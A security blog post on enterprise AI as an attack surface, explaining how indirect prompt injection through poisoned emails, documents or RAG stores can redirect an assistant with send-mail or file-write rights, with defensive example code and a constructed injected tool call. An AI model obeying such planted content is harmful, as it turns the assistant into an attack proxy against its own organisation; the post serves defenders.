AI Is Now an Attack Surface. Most Security Teams Are Still Treating It Like a Tool.
Threat actors are now targeting enterprise AI systems, not just using AI as a tool. Here are three controls security teams can implement without a new platform.
The defensive posture that treats AI strictly as a tool for defenders has become a specific liability. That's not cynicism about the technology. That's where the threat intelligence points. Nation-state actors have already crossed the line from using AI to assist attacks to targeting AI systems directly. Most security teams' threat models haven't moved with them.
The shift runs across three layers: AI as a weapon in the attack chain, AI as an attack surface in its own right, and a practitioner response gap that leaves both exposures unaddressed. I'll get to what teams can do right now — but it helps to understand what's actually happening first.
From Tool to Weapon
In February 2024, Microsoft and OpenAI jointly published research documenting five nation-state-affiliated groups using LLMs to support offensive operations. Forest Blizzard (Russia/GRU) was querying satellite and radar research. Emerald Sleet (North Korea) was crafting phishing content targeting defense-sector researchers and policy think tanks. Charcoal Typhoon (China) was using LLMs for tool development and social engineering. Two more groups were running similar playbooks.
Microsoft was precise about calibration: observed use was "early stage," and all accounts were terminated. The threat isn't that AI gave these groups new capabilities. It's that AI compressed the effort cost across every phase they were already running: reconnaissance, scripting, social engineering.
The timeline data supports this, with caveats worth stating clearly. CrowdStrike's 2024 Global Threat Report put the fastest recorded adversarial breakout time at 2 minutes 7 seconds, average around 62 minutes. IBM X-Force found AI-generated spear-phishing required roughly 5 minutes of human review versus hours for manual authorship. Neither number isolates AI as the sole cause of that compression, and IBM's phishing figure comes from a controlled scenario rather than live attacker telemetry. They're real indicators, not precision benchmarks.
The attacker advantage is not a new class of attack. It's every existing attack, faster and cheaper to execute.
From Weapon to Attack Surface
Using AI to write phishing emails is different from exploiting AI systems to carry out attacks on your behalf. Most threat models still treat these as the same category. They're not.
Prompt injection is OWASP's top LLM risk (LLM01). The direct variant, where user input overrides system instructions, is the jailbreak you've probably read about. The indirect variant is the enterprise problem. If an attacker can influence content that an enterprise AI assistant reads — a poisoned email, a shared document, a SharePoint record — they can potentially redirect the AI's actions without touching any traditional attack surface. OWASP documents the scaling risk under LLM08 (Excessive Agency): an assistant with read-only context is a confused chatbot when injected. One with send-mail and file-write permissions is an attack proxy.
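The blast-radius difference between a read-only assistant and one with send-mail or file-write permissions comes down to what the dispatcher is willing to execute. The following is an added illustration, not code from the post or from any vendor product: a default-deny tool dispatcher keyed on a per-deployment permission profile, with constructed profile names, tool names and model output.

```python
import json
import logging

# Permission profiles per deployment (constructed example values).
# The read-only helpdesk assistant gets retrieval tools only; send_mail
# and write_file are agentic capabilities that must be granted explicitly.
PROFILES = {
    "helpdesk-readonly": {"search_docs", "read_file"},
    "ops-agent": {"search_docs", "read_file", "send_mail", "write_file"},
}


def handle_tool_calls(profile: str, model_output: str):
    """Parse the tool calls the model emitted and split them into those the
    profile allows and those it does not. Unknown profiles get nothing
    (default deny). Denied calls are logged so they can be forwarded to the
    SIEM: a read-only assistant suddenly asking to send mail is a useful
    indirect-prompt-injection signal."""
    allowed = PROFILES.get(profile, set())
    try:
        calls = json.loads(model_output).get("tool_calls", [])
    except (json.JSONDecodeError, AttributeError):
        return [], []
    granted, denied = [], []
    for call in calls:
        name = call.get("name")
        if name in allowed:
            granted.append(call)
        else:
            denied.append(call)
            logging.warning("tool_call_denied profile=%s tool=%s", profile, name)
    return granted, denied


# Constructed model output: after reading a poisoned document, the
# assistant "decides" to mail a file to an external address.
INJECTED_OUTPUT = json.dumps({"tool_calls": [
    {"name": "read_file", "args": {"path": "quarterly.xlsx"}},
    {"name": "send_mail", "args": {"to": "external@example.net", "body": "..."}},
]})

if __name__ == "__main__":
    ok, blocked = handle_tool_calls("helpdesk-readonly", INJECTED_OUTPUT)
    print("dispatched:", [c["name"] for c in ok],
          "blocked:", [c["name"] for c in blocked])
```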
RAG pipeline poisoning is the longer-range version of the same problem. An attacker who can inject content into a SharePoint library or knowledge base feeding a Retrieval Augmented Generation system may be able to influence AI outputs at inference time without ever accessing the model. There are no documented production incidents of this against enterprise deployments as of early 2026, and I want to be clear about that. The attack surface is structurally real. OWASP frames it under LLM05; MITRE ATLAS documents the technique class under ML Attack Staging.
That's where the detection gap lives. Most SIEM and EDR rules are built against MITRE ATT&CK. ATLAS, which covers AI-specific attack techniques, runs as a parallel framework. The threat model expanded the moment organizations integrated AI with their data and credentials. The detection tooling hasn't kept up.
Three Moves Before You Have a Strategy
A full AI security strategy takes time to build. These three controls reduce immediate exposure without requiring one.
Treat the RAG corpus as a security boundary. SharePoint libraries and knowledge stores feeding enterprise AI deserve the same access controls and integrity monitoring as a production database. The threat vector is content injection, not network access. Most teams aren't thinking about content stores that way yet, and that's a straightforward gap to close.
Constrain AI tool permissions to least privilege. The blast radius of a successful prompt injection scales directly with what the AI can act on. Disable agentic capabilities the team isn't actively using. An AI assistant with read-only access creates an annoying incident when injected. One with send-mail and file-write capabilities creates a material one.
Establish training data provenance before fine-tuning. If the team is fine-tuning a foundation model on enterprise data, the integrity of that corpus is a security control, not a data engineering question. CISA and NSA both flag this in their joint deployment guidance. It should be owned by the security team before the first fine-tune runs, not patched in afterward.
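The first and third controls share one mechanism: an integrity record of the corpus, taken at ingestion and checked before retrieval or before a fine-tune runs. Below is an added example (not code from the post or from any product) of such a record: a per-document SHA-256 manifest bound with an HMAC so that an attacker with write access to the content store cannot simply rewrite the manifest to match an altered document. The corpus, document ids and key are constructed.

```python
import hashlib
import hmac
import json

# Constructed corpus: document id -> content, as it would be fed to a RAG
# index or a fine-tuning job. Real deployments would read these from the
# SharePoint library or knowledge store.
CORPUS_V1 = {
    "policy/expenses.md": "Expense claims over 500 USD need VP approval.",
    "faq/vpn.md": "Use the corporate VPN from unmanaged networks.",
}
MANIFEST_KEY = b"constructed-manifest-key"  # must live outside the content store


def build_manifest(corpus: dict, key: bytes) -> dict:
    """Hash every document and bind the whole set of hashes with an HMAC."""
    digests = {doc_id: hashlib.sha256(text.encode()).hexdigest()
               for doc_id, text in sorted(corpus.items())}
    body = json.dumps(digests, sort_keys=True).encode()
    return {"digests": digests, "mac": hmac.new(key, body, "sha256").hexdigest()}


def verify_corpus(corpus: dict, manifest: dict, key: bytes) -> dict:
    """Report documents that changed, appeared or vanished since the manifest
    was built. A manifest whose MAC no longer verifies is its own finding."""
    body = json.dumps(manifest["digests"], sort_keys=True).encode()
    expected = hmac.new(key, body, "sha256").hexdigest()
    if not hmac.compare_digest(expected, manifest["mac"]):
        return {"manifest_tampered": True}
    known = manifest["digests"]
    modified = [d for d, t in corpus.items()
                if d in known and hashlib.sha256(t.encode()).hexdigest() != known[d]]
    added = [d for d in corpus if d not in known]
    removed = [d for d in known if d not in corpus]
    return {"manifest_tampered": False, "modified": sorted(modified),
            "added": sorted(added), "removed": sorted(removed)}


# Constructed drift: one document edited in place, one file that never went
# through the review process.
CORPUS_V2 = dict(CORPUS_V1)
CORPUS_V2["faq/vpn.md"] += " (edited after ingestion)"
CORPUS_V2["faq/new.md"] = "Unreviewed content"

if __name__ == "__main__":
    manifest = build_manifest(CORPUS_V1, MANIFEST_KEY)
    print(verify_corpus(CORPUS_V2, manifest, MANIFEST_KEY))
```

Any non-empty `modified` or `added` list means the index or fine-tune should be blocked until the change is reviewed, which is the boundary the first control asks for.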
None of these requires a new platform purchase or a six-month initiative.
MITRE ATLAS is the right framework for this threat category. Most detection engineers don't know it well because it runs parallel to ATT&CK rather than integrated with it. That separation will probably narrow over time. Until it does, practitioners who want coverage for AI-specific attack techniques have to consult both frameworks.
The underlying issue is a framing problem. Organizations that don't extend their threat model when they extend their AI capabilities are choosing an exposure, not inheriting one. AI adoption doesn't automatically work in the defender's favor. It depends on whether the team also asks what the attacker's position looks like on that new terrain.
Sources
- Staying ahead of threat actors in the age of AI
- Disrupting malicious uses of AI by state-affiliated threat actors
- OWASP Top 10 for Large Language Model Applications
- MITRE ATLAS — Adversarial Threat Landscape for Artificial-Intelligence Systems
- CrowdStrike 2024 Global Threat Report
- IBM X-Force Threat Intelligence Index 2024
- Deploying AI Systems Securely
Revision History
2026-04-14 — published
Initial Publish